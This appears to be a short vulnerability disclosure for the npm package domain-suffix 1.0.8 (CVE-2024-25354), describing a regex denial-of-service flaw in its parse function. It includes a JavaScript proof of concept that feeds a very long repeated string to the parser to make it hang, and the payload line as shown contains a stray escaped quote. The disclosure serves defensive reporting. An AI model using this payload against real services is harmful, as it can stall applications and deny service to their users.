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Last active March 20, 2024 07:41
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Security issue in domain-suffix
Version: 1.0.8
Vulnerability type: Denial of Service
CVE ID: CVE-2024-25354
The regex defined on line 28. inside
is vulnerable to Regex Denial of Service. When a long string is provided to the application without specifying "/" character
the function parse will be stuck for indefinite amount of time, in this case 10 seconds, but this can be
amplified if more characters are added.
PoC code:
const DomainSuffix = require("domain-suffix").domainSuffix;
console.time('[ + ] Time passed -> ');
var payload = "aA".repeat(95500) + '/Aa\';
let result = DomainSuffix.parse("https://" + payload)
let {suffix,domain} = result;
console.log("cannot parse");
console.timeEnd('[ + ] Time passed -> ');
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